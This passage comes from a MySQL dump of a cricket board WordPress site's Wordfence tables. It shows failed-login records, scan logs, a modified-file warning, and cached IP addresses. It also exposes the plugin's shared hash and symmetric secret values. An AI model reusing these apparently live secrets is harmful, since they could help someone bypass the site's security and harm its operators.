x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(437,804,1624618108.244972,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��\"�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(438,805,1624618108.731434,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\"�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(439,806,1624618339.530947,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��-|Tz','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(440,807,1624618340.581367,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-|Tz','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(441,808,1624618518.233544,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���h��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(442,809,1624618518.534102,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���h��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(443,810,1624618981.311134,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(444,811,1624618982.025827,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(445,812,1624619167.725957,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���h��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(446,813,1624619167.989073,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���h��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(447,814,1624619426.499536,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(448,815,1624619427.213881,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(449,816,1624619649.283720,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(450,819,1624620752.484252,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(451,820,1624620753.237657,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(452,821,1624620827.019709,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(453,822,1624620827.748588,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(454,823,1624621268.255781,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(455,824,1624621269.466221,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(456,825,1624621743.086257,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(457,826,1624621743.389954,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(458,827,1624621898.546272,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(459,828,1624621899.071780,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(460,829,1624623539.105837,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(461,830,1624623541.074233,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_2fa_secrets`
--

LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_settings`
--

DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_settings`
--

LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624361241','yes'),('ntp-offset','0.15252304077148','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','934b3bd55215d919feee0d71283b2f42a14e497ed1738dedd96ce3c68787d3dc','yes'),('shared-symmetric-secret','211f693efe11acce6563df09757bd018de7b0938f124bf1b0bf9ce6f33af34ab','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfnotifications`
--

DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfnotifications`
--

LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-AEAAAAA',1,'wfplugin_updates',502,1624623690,'<a href=\"https://yorkshirecricketboard.org.uk/wp-adminupdate-core.php\">Updates are available for WordPress (v5.7.2), 11 plugins, and 26 themes</a>','[]'),('site-AIAAAAA',1,'wfplugin_scan',502,1624623690,'<a href=\"https://yorkshirecricketboard.org.uk/wp-adminadmin.php?page=WordfenceScan\">42 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfpendingissues`
--

DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfpendingissues`
--

LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
INSERT INTO `wp_wfpendingissues` VALUES (1,1624416757,1624416757,'new','knownfile',75,'b377e8a9aa3f4bf4dde676e8d32b4f4a','7b2f45aea25690fe306369af2a315073','WordPress core file modified: wp-content/plugins/hello.php','This WordPress core file has been modified and differs from the original file distributed with this version of WordPress.','a:6:{s:4:\"file\";s:28:\"wp-content/plugins/hello.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:1;s:6:\"canFix\";b:1;s:9:\"canDelete\";b:0;s:10:\"haveIssues\";s:4:\"core\";}');
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfreversecache`
--

DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfreversecache`
--

LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wp_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0��-��2','45.133.172.50',1628126087),('\0\0\0\0\0\0\0\0\0\0��@b)','64.21.98.41',1630396627),('\0\0\0\0\0\0\0\0\0\0��@b,','64.21.98.44',1631059593),('\0\0\0\0\0\0\0\0\0\0��@b-','64.21.98.45',1629893262),('\0\0\0\0\0\0\0\0\0\0��@b/','64.21.98.47',1629044115),('\0\0\0\0\0\0\0\0\0\0��B��','66.246.224.11',1631118544),('\0\0\0\0\0\0\0\0\0\0��B��','66.246.224.12',1630354513),('\0\0\0\0\0\0\0\0\0\0��B��\r','66.246.224.13',1630857369),('\0\0\0\0\0\0\0\0\0\0��B��','send.fcpi.net',1630521284),('\0\0\0\0\0\0\0\0\0\0��x�u','120.229.153.117',1629407007),('\0\0\0\0\0\0\0\0\0\0��x�|\'','120.235.124.39',1628318676),('\0\0\0\0\0\0\0\0\0\0��x��','120.235.138.198',1631008670),('\0\0\0\0\0\0\0\0\0\0����1','129.226.49.27',1629343120),('\0\0\0\0\0\0\0\0\0\0���c.�','207.99.46.204',1630575610),('\0\0\0\0\0\0\0\0\0\0���c.�','207.99.46.205',1626454171),('\0\0\0\0\0\0\0\0\0\0���c.�','207.99.46.206',1630139990);
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfsnipcache`
--

DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=462 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfsnipcache`
--

LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfstatus`
--

DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=245 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfstatus`
--

LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (1,1624361552.137216,10,'info','SUM_PREP:Preparing a new scan.'),(2,1624361552.142301,1,'info','Initiating quick scan'),(3,1624361552.150975,10,'info','SUM_START:Checking Web Application Firewall status'),(4,1624361552.155681,10,'info','SUM_ENDBAD:Checking Web Application Firewall status'),(5,1624361552.163269,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(6,1624361552.309994,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(7,1624361552.324596,1,'info','-------------------'),(8,1624361552.331215,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(9,1624361552.334098,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(10,1624361552.337437,10,'info','SUM_FINAL:Scan complete. You have 44 new issues to fix. See below.'),(11,1624416673.326033,1,'info','Scheduled Wordfence scan starting at Wednesday 23rd of June 2021 02:51:13 AM'),(12,1624416673.879569,10,'info','SUM_PREP:Preparing a new scan.'),(13,1624416673.941660,1,'info','Contacting Wordfence to initiate scan'),(14,1624416675.244450,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(15,1624416677.292616,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(16,1624416679.342311,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(17,1624416681.375695,10,'info','SUM_START:Checking for the most secure way to get IPs'),(18,1624416681.408077,10,'info','SUM_ENDSKIPPED:Checking for the most secure way to get IPs'),(19,1624416681.444474,10,'info','SUM_START:Scanning to check available disk space'),(20,1624416681.478128,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.29 TB'),(21,1624416681.504716,2,'info','The disk has 3445967.83 MB available'),(22,1624416681.533668,10,'info','SUM_ENDOK:Scanning to check available disk space'),(23,1624416681.622316,10,'info','SUM_START:Checking Web Application Firewall status'),(24,1624416681.727298,10,'info','SUM_ENDBAD:Checking Web Application Firewall status'),(25,1624416681.833501,10,'info','SUM_START:Checking for future GeoIP support'),(26,1624416681.884945,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(27,1624416681.935859,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(28,1624416681.986429,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(29,1624416682.104992,2,'info','Getting plugin list from WordPress'),(30,1624416682.435627,2,'info','Found 16 plugins'),(31,1624416682.441468,2,'info','Getting theme list from WordPress'),(32,1624416682.678510,2,'info','Found 31 themes'),(33,1624416683.400959,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(34,1624416687.839434,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(35,1624416688.037443,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(36,1624416691.633298,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(37,1624416691.766857,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(38,1624416694.217053,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(39,1624416694.319786,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(40,1624416694.351505,10,'info','SUM_DISABLED:Skipping theme scan'),(41,1624416694.370183,10,'info','SUM_DISABLED:Skipping plugin scan'),(42,1624416694.394508,10,'info','SUM_START:Scanning for known malware files'),(43,1624416694.451593,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(44,1624416695.909859,2,'info','500 files indexed'),(45,1624416696.066261,2,'info','1000 files indexed'),(46,1624416696.241653,2,'info','1500 files indexed'),(47,1624416696.539065,2,'info','2000 files indexed'),(48,1624416696.813467,2,'info','2500 files indexed'),(49,1624416697.083964,2,'info','3000 files indexed'),(50,1624416697.279713,2,'info','3500 files indexed'),(51,1624416697.395750,2,'info','4000 files indexed'),(52,1624416697.597168,2,'info','4500 files indexed'),(53,1624416698.133604,2,'info','5000 files indexed'),(54,1624416698.677640,2,'info','5500 files indexed'),(55,1624416699.193962,2,'info','6000 files indexed'),(56,1624416699.258803,2,'info','6500 files indexed'),(57,1624416699.285197,2,'info','7000 files indexed'),(58,1624416699.314559,2,'info','7500 files indexed'),(59,1624416699.337464,2,'info','7531 files indexed'),(60,1624416704.719156,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(61,1624416708.931250,2,'info','Analyzed 200 files containing 3.07 MB of data so far'),(62,1624416719.344076,2,'info','Analyzed 300 files containing 4.44 MB of data so far'),(63,1624416724.340788,2,'info','Analyzed 400 files containing 7.03 MB of data so far'),(64,1624416729.125122,2,'info','Analyzed 500 files containing 7.91 MB of data so far'),(65,1624416733.766834,2,'info','Analyzed 600 files containing 8.8 MB of data so far'),(66,1624416737.811302,2,'info','Analyzed 700 files containing 9.6 MB of data so far'),(67,1624416742.210906,2,'info','Analyzed 800 files containing 10.32 MB of data so far'),(68,1624416747.449543,2,'info','Analyzed 900 files containing 10.78 MB of data so far'),(69,1624416752.170986,2,'info','Analyzed 1000 files containing 11.25 MB of data so far'),(70,1624416756.617029,2,'info','Analyzed 1100 files containing 13.22 MB of data so far'),(71,1624416761.837792,2,'info','Analyzed 1200 files containing 14.74 MB of data so far'),(72,1624416766.681348,2,'info','Analyzed 1300 files containing 16.5 MB of data so far'),(73,1624416771.808705,2,'info','Analyzed 1400 files containing 17.84 MB of data so far'),(74,1624416777.665517,2,'info','Analyzed 1500 files containing 18.2 MB of data so far'),(75,1624416782.928282,2,'info','Analyzed 1600 files containing 18.55 MB of data so far'),(76,1624416790.642754,2,'info','Analyzed 1700 files containing 19 MB of data so far'),(77,1624416798.086318,2,'info','Analyzed 1800 files containing 19.35 MB of data so far'),(78,1624416804.610858,2,'info','Analyzed 1900 files containing 21.64 MB of data so far'),(79,1624416811.205905,2,'info','Analyzed 2000 files containing 25.79 MB of data so far'),(80,1624416815.708143,2,'info','Analyzed 2100 files containing 26.95 MB of data so far'),(81,1624416819.902641,2,'info','Analyzed 2200 files containing 29.21 MB of data so far'),(82,1624416824.805741,2,'info','Analyzed 2300 files containing 35.05 MB of data so far'),(83,1624416829.411127,2,'info','Analyzed 2400 files containing 36.04 MB of data so far'),(84,1624416833.571056,2,'info','Analyzed 2500 files containing 37.59 MB of data so far'),(85,1624416836.509364,2,'info','Analyzed 2600 files containing 37.94 MB of data so far'),(86,1624416841.157084,2,'info','Analyzed 2700 files containing 38.59 MB of data so far'),(87,1624416845.805695,2,'info','Analyzed 2800 files containing 38.9 MB of data so far'),(88,1624416850.104535,2,'info','Analyzed 2900 files containing 39.73 MB of data so far'),(89,1624416854.642643,2,'info','Analyzed 3000 files containing 41.83 MB of data so far'),(90,1624416859.741705,2,'info','Analyzed 3100 files containing 44.34 MB of data so far'),(91,1624416864.631640,2,'info','Analyzed 3200 files containing 47.41 MB of data so far'),(92,1624416869.793143,2,'info','Analyzed 3300 files containing 51.28 MB of data so far'),(93,1624416875.610313,2,'info','Analyzed 3400 files containing 55.29 MB of data so far'),(94,1624416880.521412,2,'info','Analyzed 3500 files containing 59.76 MB of data so far'),(95,1624416885.216953,2,'info','Analyzed 3600 files containing 62.66 MB of data so far'),(96,1624416890.710545,2,'info','Analyzed 3700 files containing 66.14 MB of data so far'),(97,1624416895.267425,2,'info','Analyzed 3800 files containing 68.78 MB of data so far'),(98,1624416899.800450,2,'info','Analyzed 3900 files containing 71.46 MB of data so far'),(99,1624416905.361925,2,'info','Analyzed 4000 files containing 76.01 MB of data so far'),(100,1624416910.414997,2,'info','Analyzed 4100 files containing 78.57 MB of data so far'),(101,1624416915.263057,2,'info','Analyzed 4200 files containing 80.54 MB of data so far'),(102,1624416918.939316,2,'info','Analyzed 4300 files containing 81.89 MB of data so far'),(103,1624416925.114988,2,'info','Analyzed 4400 files containing 84.24 MB of data so far'),(104,1624416929.685284,2,'info','Analyzed 4500 files containing 88.98 MB of data so far'),(105,1624416934.513871,2,'info','Analyzed 4600 files containing 90.45 MB of data so far'),(106,1624416942.158850,2,'info','Analyzed 4700 files containing 93.25 MB of data so far'),(107,1624416946.952254,2,'info','Analyzed 4800 files containing 94.79 MB of data so far'),(108,1624416952.470842,2,'info','Analyzed 4900 files containing 98.13 MB of data so far'),(109,1624416959.328616,2,'info','Analyzed 5000 files containing 99.87 MB of data so far'),(110,1624416963.840465,2,'info','Analyzed 5100 files containing 101.34 MB of data so far'),(111,1624416968.536382,2,'info','Analyzed 5200 files containing 104.27 MB of data so far'),(112,1624416974.431625,2,'info','Analyzed 5300 files containing 105.88 MB of data so far'),(113,1624416978.967166,2,'info','Analyzed 5400 files containing 108.3 MB of data so far'),(114,1624416983.142455,2,'info','Analyzed 5500 files containing 110.34 MB of data so far'),(115,1624416988.076897,2,'info','Analyzed 5600 files containing 112.65 MB of data so far'),(116,1624416992.289722,2,'info','Analyzed 5700 files containing 114.19 MB of data so far'),(117,1624416996.751483,2,'info','Analyzed 5800 files containing 116.54 MB of data so far'),(118,1624417001.521397,2,'info','Analyzed 5900 files containing 119 MB of data so far'),(119,1624417007.742606,2,'info','Analyzed 6000 files containing 120.5 MB of data so far'),(120,1624417012.530478,2,'info','Analyzed 6100 files containing 126.51 MB of data so far'),(121,1624417017.128304,2,'info','Analyzed 6200 files containing 128.1 MB of data so far'),(122,1624417022.576137,2,'info','Analyzed 6300 files containing 130.9 MB of data so far'),(123,1624417025.594166,2,'info','Analyzed 6400 files containing 131.82 MB of data so far'),(124,1624417030.730998,2,'info','Analyzed 6500 files containing 132.44 MB of data so far'),(125,1624417037.561276,2,'info','Analyzed 6600 files containing 134.43 MB of data so far'),(126,1624417047.472343,2,'info','Analyzed 6700 files containing 137.23 MB of data so far'),(127,1624417053.612486,2,'info','Analyzed 6800 files containing 138.67 MB of data so far'),(128,1624417060.443807,2,'info','Analyzed 6900 files containing 147.33 MB of data so far'),(129,1624417067.422623,2,'info','Analyzed 7000 files containing 153.54 MB of data so far'),(130,1624417072.156745,2,'info','Analyzed 7100 files containing 154.87 MB of data so far'),(131,1624417077.297734,2,'info','Analyzed 7200 files containing 157.32 MB of data so far'),(132,1624417081.731192,2,'info','Analyzed 7300 files containing 161.19 MB of data so far'),(133,1624417086.644290,2,'info','Analyzed 7400 files containing 163.01 MB of data so far'),(134,1624417091.089374,2,'info','Analyzed 7500 files containing 164.57 MB of data so far'),(135,1624417092.921733,2,'info','Analyzed 7531 files containing 164.99 MB of data.'),(136,1624417092.939137,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(137,1624417092.981689,10,'info','SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),(138,1624417093.695639,10,'info','SUM_ENDOK:Scanning for known malware files'),(139,1624417093.822875,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(140,1624417093.851119,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(141,1624417093.905309,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(142,1624417093.953593,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(143,1624417098.151318,2,'info','Starting scan of file contents'),(144,1624417099.768059,2,'info','Scanned contents of 18 additional files at 17.89 per second'),(145,1624417100.806656,2,'info','Scanned contents of 36 additional files at 17.61 per second'),(146,1624417101.837837,2,'info','Scanned contents of 52 additional files at 16.91 per second'),(147,1624417102.866027,2,'info','Scanned contents of 72 additional files at 17.54 per second'),(148,1624417103.911318,2,'info','Scanned contents of 88 additional files at 17.09 per second'),(149,1624417104.941253,2,'info','Scanned contents of 109 additional files at 17.64 per second'),(150,1624417106.020871,2,'info','Scanned contents of 136 additional files at 18.74 per second'),(151,1624417107.045937,2,'info','Scanned contents of 164 additional files at 19.80 per second'),(152,1624417108.056800,2,'info','Scanned contents of 187 additional files at 20.12 per second'),(153,1624417109.120709,2,'info','Scanned contents of 208 additional files at 20.08 per second'),(154,1624417110.140821,2,'info','Scanned contents of 229 additional files at 20.13 per second'),(155,1624417111.184090,2,'info','Scanned contents of 248 additional files at 19.96 per second'),(156,1624417112.197471,2,'info','Scanned contents of 271 additional files at 20.17 per second'),(157,1624417113.232048,2,'info','Scanned contents of 286 additional files at 19.77 per second'),(158,1624417114.820975,2,'info','Scanned contents of 298 additional files at 18.56 per second'),(159,1624417115.937940,2,'info','Scanned contents of 317 additional files at 18.46 per second'),(160,1624417116.956169,2,'info','Scanned contents of 339 additional files at 18.63 per second'),(161,1624417117.967258,2,'info','Scanned contents of 364 additional files at 18.95 per second'),(162,1624417119.010577,2,'info','Scanned contents of 383 additional files at 18.91 per second'),(163,1624417120.065178,2,'info','Scanned contents of 405 additional files at 19.01 per second'),(164,1624417121.095148,2,'info','Scanned contents of 431 additional files at 19.30 per second'),(165,1624417122.104504,2,'info','Scanned contents of 449 additional files at 19.24 per second'),(166,1624417123.145898,2,'info','Scanned contents of 469 additional files at 19.23 per second'),(167,1624417124.191172,2,'info','Scanned contents of 495 additional files at 19.47 per second'),(168,1624417125.210599,2,'info','Scanned contents of 521 additional files at 19.70 per second'),(169,1624417126.250490,2,'info','Scanned contents of 544 additional files at 19.79 per second'),(170,1624417127.264284,2,'info','Scanned contents of 567 additional files at 19.89 per second'),(171,1624417128.302185,2,'info','Scanned contents of 591 additional files at 20.01 per second'),(172,1624417129.315245,2,'info','Scanned contents of 615 additional files at 20.13 per second'),(173,1624417130.648556,2,'info','Scanned contents of 634 additional files at 19.88 per second'),(174,1624417131.661325,2,'info','Scanned contents of 654 